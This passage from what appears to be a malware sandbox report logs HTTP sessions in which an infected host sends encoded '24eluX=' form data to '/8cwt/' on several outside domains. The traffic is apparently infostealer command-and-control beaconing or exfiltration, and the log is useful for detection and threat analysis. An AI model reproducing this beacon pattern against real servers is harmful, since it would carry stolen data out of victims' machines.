                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      56192.168.11.304990491.195.240.12380
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:20:46.683096886 CEST1611OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.k4ryd.us
                                      Referer: http://www.k4ryd.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 39 4c 4c 4d 6f 61 75 57 4f 6b 75 51 4b 63 43 6a 4d 36 73 2b 6b 67 31 6e 2f 4d 33 64 48 65 45 41 65 49 64 78 45 38 43 57 62 56 54 6b 38 71 76 47 31 6e 4b 51 62 30 2b 37 37 44 50 65 77 72 6e 53 46 55 6e 6b 45 76 71 4e 6c 33 67 4e 73 46 5a 63 75 32 77 76 41 39 52 31 6e 32 33 4a 47 68 62 63 35 65 52 32 7a 44 2f 4e 70 4a 79 37 44 4a 47 7a 43 37 4d 72 44 2f 39 65 70 55 30 66 34 37 78 4a 31 34 46 73 38 5a 44 63 31 41 39 33 48 4a 64 55 54 39 72 33 30 71 37 35 46 30 66 63 35 48 4d 48 6b 75 46 76 79 74 42 66 35 42 4e 4c 57 53 65 44 57 66 78 65 54 6a 73 31 2f 6b 50 4a 31 45 63 6a 44 52 46 63 43 69 6b 68 71 74 6d 68 44 49 50 72 66 6d 44 31 44 44 74 65 67 66 32 2b 58 35 62 4e 52 47 51 7a 6d 42 78 72 6b 4c 2f 62 5a 6f 73 68 70 61 62 43 4d 4b 51 69 72 63 75 30 51 74 42 63 36 45 44 7a 4d 65 78 6a 6b 46 51 4d 76 72 4b 51 71 2b 67 6d 6f 34 49 2f 65 68 5a 67 73 4f 6e 42 52 50 56 39 6e 6a 78 36 50 36 66 62 7a 4e 63 78 31 46 58 71 69 6c 45 77 58 55 76 59 71 6a 70 79 6e 72 75 65 57 58 31 79 5a 6f 4f [TRUNCATED]
                                      Data Ascii: 24eluX=9LLMoauWOkuQKcCjM6s+kg1n/M3dHeEAeIdxE8CWbVTk8qvG1nKQb0+77DPewrnSFUnkEvqNl3gNsFZcu2wvA9R1n23JGhbc5eR2zD/NpJy7DJGzC7MrD/9epU0f47xJ14Fs8ZDc1A93HJdUT9r30q75F0fc5HMHkuFvytBf5BNLWSeDWfxeTjs1/kPJ1EcjDRFcCikhqtmhDIPrfmD1DDtegf2+X5bNRGQzmBxrkL/bZoshpabCMKQircu0QtBc6EDzMexjkFQMvrKQq+gmo4I/ehZgsOnBRPV9njx6P6fbzNcx1FXqilEwXUvYqjpynrueWX1yZoOgKQ0lmTzbhHFDFBx3R/BytG/hb99HY62uRGyjv+oCX9B8T1Ayvf4o/Q0KagAEVAKeTbzf7G7BTp80jAYIdv66rt50H4H6eioXC3NiKa1iyJDHN31PqdSkpg2RTeMGJDQQZwzK0cmtxwh/6spDY1vo23xgjxBGtYVvD9xpWR2cyfjLtLB8i1VMsVRzKX4Mtz2yPLhjE9qW/sN/KDQVVQ+wyRtg9CNvsUbiG6a8EzqpOBx3tyQLUbNnnYC0MR5LTc6VjDE9mnbTCfnkI9i0zaBrxQ3sWTm2HvrHBpEmmYGcRjKj4BINpsG1IWCLpOflT9FrMgI8psbqym4F/8pNv887m9EpBQf2cn8fZTUIaJzjCRlDkdsj5AUHfmBFUoPhA1RYx+QKadY+9sbLe9gnM1CJr4kUmI+wLYXSjvnk+Urzfb7gOf6u8jFSUvjM2axpA8/ziq6VgpL00AauUT8WdWsYk6tLZQlBGC4jajLYw5/UYbXGPLxof8CaiuONeURmm8cDtCud1LzwCvF18ZJr6ocLX3egckcz0mc2KNRT26QquzoPa3IvJeE86G6k35hdCnqUqeXNUYzrU/nktIXLzWA0vVVZjp/aAvSENlCz0pIw1xlZLD+16kUzWlIzWWR0m4MlyRd5cfddnYMPeEXpGE06x1VEvFz9zwU1x [TRUNCATED]
                                      Jun 4, 2024 14:20:46.909781933 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      57192.168.11.304990591.195.240.12380
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:20:49.432606936 CEST423OUTGET /8cwt/?24eluX=wJjsrv+xTFW5EezvLu5DoT5e4On1D8g+dr15EOXITWTD1anv0RLrfGS01TvW8pCuGmfcOvvelUpztksk4WpfZfFxijTtARXG8NIL7Taa8Kq3eoSsUv86NcY=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:20:49.658915997 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      58192.168.11.304990766.81.203.19680
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:22:27.191332102 CEST707OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.accentbathrooms.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.accentbathrooms.com
                                      Referer: http://www.accentbathrooms.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 34 37 79 38 79 63 32 55 70 73 4d 42 56 76 6d 41 6a 76 53 63 65 77 49 36 6e 64 79 63 32 42 4a 42 79 66 6e 30 55 35 36 73 4a 4e 5a 52 38 6d 6c 6f 35 4c 50 6d 42 52 67 44 47 42 43 7a 72 61 37 39 6c 7a 35 39 4f 37 56 49 38 62 73 6b 57 6f 72 43 4c 74 2f 48 65 4a 38 6d 64 52 67 32 52 50 71 54 4e 34 65 6f 35 62 44 47 4c 78 4e 50 30 2b 39 6a 41 35 55 31 75 59 47 51 78 59 54 66 34 70 33 37 71 75 49 45 6c 79 75 71 4f 45 69 35 69 57 50 54 35 52 6f 34 2b 48 4a 64 66 45 2b 4f 39 6d 47 31 6d 74 4b 46 54 30 37 4a 41 34 55 45 32 73 59 31 6a 4c 59 6b 78 66 41 4c 4a 6e 2f 78 56 35 43 31 61 77 3d 3d
                                      Data Ascii: 24eluX=47y8yc2UpsMBVvmAjvScewI6ndyc2BJByfn0U56sJNZR8mlo5LPmBRgDGBCzra79lz59O7VI8bskWorCLt/HeJ8mdRg2RPqTN4eo5bDGLxNP0+9jA5U1uYGQxYTf4p37quIElyuqOEi5iWPT5Ro4+HJdfE+O9mG1mtKFT07JA4UE2sY1jLYkxfALJn/xV5C1aw==
                                      Jun 4, 2024 14:22:27.353035927 CEST380INHTTP/1.1 403 Forbidden
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:22:27 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 90 31 0e c2 30 0c 45 77 24 ee 60 ba a7 a1 d0 31 64 41 20 31 30 71 82 a4 36 4d a4 34 41 21 12 f4 f6 24 50 24 c4 cc c8 e8 ef e7 67 cb c2 a4 c1 c9 f9 4c 18 52 28 45 b2 c9 91 6c 97 6b d8 87 a8 2d 22 79 c1 5f a1 e0 4f 24 a3 3a e0 08 ba ef 82 0b 71 53 dd 8c 4d 54 15 45 47 3e 51 94 c2 34 df 86 9c 08 3e b5 cb ae 0c 4d 95 ef ad bf f3 a6 6e da 7a f5 89 f0 b2 a4 48 f9 fb c0 05 63 a0 e0 a2 10 ad ef 21 05 40 7b 55 da 11 1c 4f 87 1d 28 8f b0 35 31 0c 04 e7 68 c9 a3 1b 81 62 0c 31 4f f4 04 8c 15 d7 5f f1 cb 5f 3c 00 d2 96 ee 17 3b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: bc10Ew$`1dA 10q6M4A!$P$gLR(Elk-"y_O$:qSMTEG>Q4>MnzHc!@{UO(51hb1O__<;0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      59192.168.11.304990866.81.203.19680
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:22:29.873224974 CEST727OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.accentbathrooms.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.accentbathrooms.com
                                      Referer: http://www.accentbathrooms.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 34 37 79 38 79 63 32 55 70 73 4d 42 55 4d 75 41 6c 38 4b 63 59 51 49 35 36 74 79 63 6a 78 49 49 79 66 37 30 55 35 53 43 49 2f 74 52 38 48 56 6f 36 4a 33 6d 43 52 67 44 4f 68 43 36 68 36 37 79 6c 7a 30 41 4f 2f 64 49 38 59 51 6b 57 74 76 43 4b 65 6e 45 4d 70 38 65 62 52 67 77 63 76 71 54 4e 34 65 6f 35 66 6a 38 4c 79 39 50 30 74 6c 6a 41 63 34 32 77 6f 47 50 6e 49 54 66 38 70 33 67 71 75 4a 52 6c 77 61 51 4f 41 53 35 69 58 2f 54 36 45 45 6e 30 48 4a 45 53 6b 2f 6b 79 45 71 77 73 70 36 36 65 53 6a 41 4b 4e 4d 36 7a 37 70 76 2b 49 73 6d 69 2f 38 6d 56 6d 53 5a 58 37 44 75 48 2f 37 4d 42 42 79 38 42 53 63 6c 77 6b 42 66 41 6a 71 4a 41 73 67 3d
                                      Data Ascii: 24eluX=47y8yc2UpsMBUMuAl8KcYQI56tycjxIIyf70U5SCI/tR8HVo6J3mCRgDOhC6h67ylz0AO/dI8YQkWtvCKenEMp8ebRgwcvqTN4eo5fj8Ly9P0tljAc42woGPnITf8p3gquJRlwaQOAS5iX/T6EEn0HJESk/kyEqwsp66eSjAKNM6z7pv+Ismi/8mVmSZX7DuH/7MBBy8BSclwkBfAjqJAsg=
                                      Jun 4, 2024 14:22:30.031626940 CEST380INHTTP/1.1 403 Forbidden
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:22:29 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 90 31 0e c2 30 0c 45 77 24 ee 60 ba a7 a1 d0 31 64 41 20 31 30 71 82 a4 36 4d a4 34 41 21 12 f4 f6 24 50 24 c4 cc c8 e8 ef e7 67 cb c2 a4 c1 c9 f9 4c 18 52 28 45 b2 c9 91 6c 97 6b d8 87 a8 2d 22 79 c1 5f a1 e0 4f 24 a3 3a e0 08 ba ef 82 0b 71 53 dd 8c 4d 54 15 45 47 3e 51 94 c2 34 df 86 9c 08 3e b5 cb ae 0c 4d 95 ef ad bf f3 a6 6e da 7a f5 89 f0 b2 a4 48 f9 fb c0 05 63 a0 e0 a2 10 ad ef 21 05 40 7b 55 da 11 1c 4f 87 1d 28 8f b0 35 31 0c 04 e7 68 c9 a3 1b 81 62 0c 31 4f f4 04 8c 15 d7 5f f1 cb 5f 3c 00 d2 96 ee 17 3b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: bc10Ew$`1dA 10q6M4A!$P$gLR(Elk-"y_O$:qSMTEG>Q4>MnzHc!@{UO(51hb1O__<;0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      60192.168.11.304990966.81.203.19680
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:22:32.565224886 CEST1644OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.accentbathrooms.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.accentbathrooms.com
                                      Referer: http://www.accentbathrooms.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 34 37 79 38 79 63 32 55 70 73 4d 42 55 4d 75 41 6c 38 4b 63 59 51 49 35 36 74 79 63 6a 78 49 49 79 66 37 30 55 35 53 43 49 2f 31 52 39 78 70 6f 35 75 62 6d 4e 78 67 44 45 42 43 2f 68 36 37 76 6c 7a 73 4d 4f 2f 5a 59 38 64 55 6b 45 66 6e 43 4e 72 54 45 56 5a 38 65 5a 52 67 78 52 50 71 38 4e 34 4f 30 35 62 50 38 4c 79 39 50 30 72 68 6a 4a 70 55 32 79 6f 47 51 78 59 54 70 34 70 32 50 71 76 68 42 6c 77 65 41 4f 7a 61 35 69 33 76 54 34 32 38 6e 70 58 4a 52 58 6b 2f 38 79 45 6e 67 73 76 65 51 65 58 65 62 4b 4b 67 36 78 4f 6b 57 37 6f 77 42 39 64 4d 77 51 33 2b 32 57 4c 72 6a 65 73 4c 77 4b 69 4f 4e 47 54 30 58 2b 78 46 44 59 78 79 46 5a 5a 62 49 6a 68 63 38 44 50 65 46 51 53 48 70 77 2b 62 53 33 65 6c 53 77 41 59 57 76 68 67 51 52 43 61 4a 57 6b 37 2b 69 68 58 66 79 70 56 4b 4c 67 62 77 69 7a 6b 63 61 68 33 37 57 6d 57 56 4b 79 51 4e 42 69 5a 53 5a 39 55 2b 30 7a 78 31 75 54 6c 73 45 33 75 71 41 35 49 33 39 44 57 31 61 38 56 2b 4b 70 4c 54 6e 66 4f 2f 44 4e 4b 79 37 54 31 7a 70 58 42 [TRUNCATED]
                                      Data Ascii: 24eluX=47y8yc2UpsMBUMuAl8KcYQI56tycjxIIyf70U5SCI/1R9xpo5ubmNxgDEBC/h67vlzsMO/ZY8dUkEfnCNrTEVZ8eZRgxRPq8N4O05bP8Ly9P0rhjJpU2yoGQxYTp4p2PqvhBlweAOza5i3vT428npXJRXk/8yEngsveQeXebKKg6xOkW7owB9dMwQ3+2WLrjesLwKiONGT0X+xFDYxyFZZbIjhc8DPeFQSHpw+bS3elSwAYWvhgQRCaJWk7+ihXfypVKLgbwizkcah37WmWVKyQNBiZSZ9U+0zx1uTlsE3uqA5I39DW1a8V+KpLTnfO/DNKy7T1zpXBj1ZxOTOl0wHK+/p5M/yXrP7psvzQA7/adRdlekTFWZTrnOIwFjmeddmmTRJ5NqkNkAuu9emYlRacP4LI1y8rVPlmc4+71LVVDL3a/78nWMRnXy/SQN/BAumdPz8WZR/yiUkn8IwZ2vccn8YY7m/SlME9J668NROUiVnVUpSl8XVXG0ayywdkOkb9eHfvqQydJB5fJWm2LJJcNZrxvjT/pxSoFaP/yFpPBOurJmfbWh/Kc3bap4yoZlrGLdH1vbXOM847Ixz2wwiUE57g6omsgD/KkeKFz84vrBRjViWZdTFBWey6G2Ubg3GBD0U1yX+AIV8FEjq0F8ytOqQe0fA7NLuN9fWn4eNB6c4VKhB3O41eW8FLIMwMb5nA03FUOdjeITegdMcCHLtZzkpYdb9ivE+v1xmMpe6+FCxWpG466uPbDBROvKDxhv6gjqIa7yljcTUXpaF+hKicRAdtDysMLK88VxFeU8mJgvZGJVKRUObrpAcTeEGp4Xo74GCgEQoPl9xo/myYIUSlb8ylLEN91WgO7RhdVAZd+pBjkk1gYcRJoy9iSJ8Ubnr5xeqMqZ0lYj5NhRCOuC2Thew2Udc/6gBI57m2EriY0eEPO5Pd1KQTXksxsE31F8N3eotg5GWCW0ZI1Co0FjBiU+KVzuvEg8WqR5vz2ClVFV [TRUNCATED]
                                      Jun 4, 2024 14:22:32.728575945 CEST380INHTTP/1.1 403 Forbidden
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:22:32 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 90 31 0e c2 30 0c 45 77 24 ee 60 ba a7 a1 d0 31 64 41 20 31 30 71 82 a4 36 4d a4 34 41 21 12 f4 f6 24 50 24 c4 cc c8 e8 ef e7 67 cb c2 a4 c1 c9 f9 4c 18 52 28 45 b2 c9 91 6c 97 6b d8 87 a8 2d 22 79 c1 5f a1 e0 4f 24 a3 3a e0 08 ba ef 82 0b 71 53 dd 8c 4d 54 15 45 47 3e 51 94 c2 34 df 86 9c 08 3e b5 cb ae 0c 4d 95 ef ad bf f3 a6 6e da 7a f5 89 f0 b2 a4 48 f9 fb c0 05 63 a0 e0 a2 10 ad ef 21 05 40 7b 55 da 11 1c 4f 87 1d 28 8f b0 35 31 0c 04 e7 68 c9 a3 1b 81 62 0c 31 4f f4 04 8c 15 d7 5f f1 cb 5f 3c 00 d2 96 ee 17 3b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: bc10Ew$`1dA 10q6M4A!$P$gLR(Elk-"y_O$:qSMTEG>Q4>MnzHc!@{UO(51hb1O__<;0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      61192.168.11.304991066.81.203.19680
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:22:35.246881962 CEST434OUTGET /8cwt/?24eluX=15acxp6jrOd/buvS9YLoVCwQt/eIj0wV8tP3YL3PMsIjyFVitYjgFC8LDxGQh6T0kTJLIrMUzadAXsDAGdfiNfgPYx4xbqKJILHq2u+5CghFrM1CdZcxiKw=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.accentbathrooms.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:22:35.405052900 CEST721INHTTP/1.1 404 Not Found
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:22:35 GMT
                                      Content-Type: text/html
                                      Content-Length: 571
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      62192.168.11.3049911162.43.104.16480
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:22:40.716788054 CEST701OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.shun-yamagata.com
                                      Referer: http://www.shun-yamagata.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 6f 38 61 74 65 31 71 36 4d 71 6f 6f 2b 67 7a 59 4b 37 2b 53 72 66 36 4d 63 63 37 75 38 42 7a 63 75 2b 51 74 73 31 48 47 57 51 63 4f 50 53 36 39 74 47 44 68 2f 34 4c 6e 62 49 6b 2b 44 33 52 62 36 4b 38 79 73 4b 56 64 4e 6a 4b 4a 76 4f 6b 72 5a 4f 56 69 74 36 57 70 70 30 6c 49 61 6e 61 36 5a 38 46 52 73 36 63 6b 67 2f 52 68 6b 43 6f 6c 43 67 58 78 74 49 70 4c 4f 45 2f 44 38 67 56 6e 67 4b 59 76 6e 6d 42 75 52 69 71 65 2b 47 39 77 73 69 58 35 45 47 53 33 4f 69 39 7a 69 46 42 4a 50 63 65 35 52 58 47 4e 37 33 6b 6a 58 76 63 61 37 77 6e 4e 63 72 36 79 2f 2f 4a 47 35 6e 54 58 6d 67 3d 3d
                                      Data Ascii: 24eluX=o8ate1q6Mqoo+gzYK7+Srf6Mcc7u8Bzcu+Qts1HGWQcOPS69tGDh/4LnbIk+D3Rb6K8ysKVdNjKJvOkrZOVit6Wpp0lIana6Z8FRs6ckg/RhkColCgXxtIpLOE/D8gVngKYvnmBuRiqe+G9wsiX5EGS3Oi9ziFBJPce5RXGN73kjXvca7wnNcr6y//JG5nTXmg==
                                      Jun 4, 2024 14:22:41.019733906 CEST1289INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:22:39 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: W/"afe-6014d9a904f4f"
                                      Content-Encoding: gzip
                                      Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b [TRUNCATED]
                                      Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r [TRUNCATED]
                                      Jun 4, 2024 14:22:41.019752979 CEST300INData Raw: b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64 ea c5 69
                                      Data Ascii: -%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      63192.168.11.3049912162.43.104.16480
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:22:43.518687010 CEST721OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.shun-yamagata.com
                                      Referer: http://www.shun-yamagata.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
